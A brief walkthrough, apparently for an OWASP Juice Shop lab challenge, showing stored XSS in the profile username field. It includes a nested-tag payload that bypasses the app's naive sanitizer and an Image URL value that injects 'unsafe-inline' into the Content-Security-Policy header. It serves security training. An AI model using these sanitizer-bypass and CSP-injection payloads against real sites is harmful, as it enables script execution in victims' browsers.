Navigate to https://localhost:88 or https://demo.owasp-juice.shop.
Log in with a Juice Shop account.
A forced directory search, nikto scan, or other scan finds the /profile subdirectory. Manually navigate to it.
Enter this following value in Username:
<script>alert(`xss)</script>`
This is sanitized, but the sanitizer is naive.
Enter the following in Username:
<<a|ascript>alert(`xss)</script>`
Set the Image URL field to https://placekitten/300/300.
Note that the Content-Security-Header on the response page contains an entry like:
/assets/public/images/uploads/22.jpg; script-src 'self' 'unsafe-eval' https://code.getmdl.io http://ajax.googleapis.com
Submit http://not.an.image/image.png in the Image URL and view the response:
http://not.an.image/image.png; script-src 'self' 'unsafe-eval' https://code.getmdl.io http://ajax.googleapis.com
Now submit the following text for the Image URL:
http://not.an.image/image.png script-src 'unsafe-inline' 'self' 'unsafe-eval' https://code.getmdl.io http://ajax.googleapis.com